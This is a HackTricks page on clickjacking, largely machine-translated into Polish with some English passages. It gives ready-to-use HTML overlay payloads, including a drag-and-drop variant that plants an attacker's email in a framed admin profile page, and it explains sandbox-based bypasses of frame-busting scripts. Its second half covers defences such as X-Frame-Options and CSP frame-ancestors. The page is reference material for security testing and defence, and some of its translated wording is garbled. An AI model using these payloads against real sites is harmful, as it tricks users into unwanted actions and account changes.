Clickjacking

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

What is Clickjacking

W ataku clickjacking, użytkownik jest oszukiwany do kliknięcia w element na stronie internetowej, który jest albo niewidoczny, albo przebrany za inny element. Ta manipulacja może prowadzić do niezamierzonych konsekwencji dla użytkownika, takich jak pobieranie złośliwego oprogramowania, przekierowanie na złośliwe strony internetowe, udostępnienie danych logowania lub informacji wrażliwych, przelewy pieniędzy lub zakupy produktów online.

Prepopulate forms trick

Czasami możliwe jest wypełnienie wartości pól formularza za pomocą parametrów GET podczas ładowania strony. Atakujący może nadużyć tego zachowania, aby wypełnić formularz dowolnymi danymi i wysłać ładunek clickjacking, aby użytkownik nacisnął przycisk Wyślij.

Populate form with Drag&Drop

Jeśli potrzebujesz, aby użytkownik wypełnił formularz, ale nie chcesz bezpośrednio prosić go o wpisanie jakichś konkretnych informacji (jak e-mail lub konkretne hasło, które znasz), możesz po prostu poprosić go o przeciągnięcie i upuszczenie czegoś, co zapisze twoje kontrolowane dane, jak w tym przykładzie.

Basic Payload

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Wieloetapowy ładunek

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click ładunek

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Jeśli zidentyfikowałeś atak XSS, który wymaga, aby użytkownik kliknął na jakiś element, aby wywołać XSS, a strona jest vulnerable to clickjacking, możesz to wykorzystać, aby oszukać użytkownika do kliknięcia przycisku/linku. Przykład: Znalazłeś self XSS w niektórych prywatnych szczegółach konta (szczegóły, które tylko ty możesz ustawić i odczytać). Strona z formularzem do ustawienia tych szczegółów jest vulnerable na Clickjacking i możesz wstępnie wypełnić formularz parametrami GET. __Atakujący mógłby przygotować atak Clickjacking na tę stronę wstępnie wypełniając formularz ładunkiem XSS i oszukując użytkownika do wysłania formularza. Tak więc, gdy formularz zostanie wysłany i wartości zostaną zmodyfikowane, użytkownik wykona XSS.

Strategie łagodzenia Clickjacking

Ochrona po stronie klienta

Skrypty wykonywane po stronie klienta mogą podejmować działania, aby zapobiec Clickjacking:

Zapewnienie, że okno aplikacji jest głównym lub górnym oknem.
Uczynienie wszystkich ramek widocznymi.
Zapobieganie kliknięciom w niewidoczne ramki.
Wykrywanie i informowanie użytkowników o potencjalnych próbach Clickjacking.

Jednak te skrypty do łamania ramek mogą być obejście:

Ustawienia zabezpieczeń przeglądarek: Niektóre przeglądarki mogą blokować te skrypty w zależności od ich ustawień zabezpieczeń lub braku wsparcia dla JavaScript.
Atrybut sandbox iframe HTML5: Atakujący może zneutralizować skrypty do łamania ramek, ustawiając atrybut sandbox z wartościami allow-forms lub allow-scripts bez allow-top-navigation. To uniemożliwia iframe weryfikację, czy jest górnym oknem, np.,

<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.

Server-Side Defenses

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a <frame> or <iframe>, helping to prevent Clickjacking:

X-Frame-Options: deny - Żaden domena nie może osadzić treści.
X-Frame-Options: sameorigin - Tylko bieżąca strona może osadzić treść.
X-Frame-Options: allow-from https://trusted.com - Tylko określony 'uri' może osadzić stronę.
Zauważ ograniczenia: jeśli przeglądarka nie obsługuje tej dyrektywy, może nie działać. Niektóre przeglądarki preferują dyrektywę CSP frame-ancestors.

Content Security Policy (CSP) frame-ancestors directive

frame-ancestors directive in CSP is the advised method for Clickjacking protection:

frame-ancestors 'none' - Podobnie jak X-Frame-Options: deny.
frame-ancestors 'self' - Podobnie jak X-Frame-Options: sameorigin.
frame-ancestors trusted.com - Podobnie jak X-Frame-Options: allow-from.

For instance, the following CSP only allows framing from the same domain:

Content-Security-Policy: frame-ancestors 'self';

Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla's CSP frame-ancestors documentation.

Content Security Policy (CSP) with `child-src` and `frame-src`

Content Security Policy (CSP) is a security measure that helps in preventing Clickjacking and other code injection attacks by specifying which sources the browser should allow to load content.

`frame-src` Directive

Definiuje ważne źródła dla ramek.
Bardziej szczegółowe niż dyrektywa default-src.

Content-Security-Policy: frame-src 'self' https://trusted-website.com;

Ta polityka pozwala na ramki z tego samego pochodzenia (self) oraz https://trusted-website.com.

Dyrektywa `child-src`

Wprowadzona w poziomie 2 CSP w celu ustawienia ważnych źródeł dla pracowników sieciowych i ramek.
Działa jako zapas dla frame-src i worker-src.

Content-Security-Policy: child-src 'self' https://trusted-website.com;

Ta polityka pozwala na ramki i pracowników z tego samego pochodzenia (self) oraz https://trusted-website.com.

Uwagi dotyczące użytkowania:

Deprecacja: child-src jest stopniowo wycofywane na rzecz frame-src i worker-src.
Zachowanie w przypadku braku: Jeśli frame-src jest nieobecne, child-src jest używane jako zapasowe dla ramek. Jeśli oba są nieobecne, używane jest default-src.
Ścisła definicja źródła: Uwzględnij tylko zaufane źródła w dyrektywach, aby zapobiec wykorzystaniu.

Skrypty JavaScript łamiące ramki

Chociaż nie są całkowicie niezawodne, skrypty łamiące ramki oparte na JavaScript mogą być używane do zapobiegania osadzaniu strony internetowej w ramkach. Przykład:

if (top !== self) {
top.location = self.location;
}

Wykorzystanie tokenów Anti-CSRF

Walidacja tokenów: Użyj tokenów anti-CSRF w aplikacjach internetowych, aby upewnić się, że żądania zmieniające stan są wykonywane celowo przez użytkownika, a nie przez stronę Clickjacked.

Odniesienia

Użyj Trickest, aby łatwo budować i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Uzyskaj dostęp już dziś:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks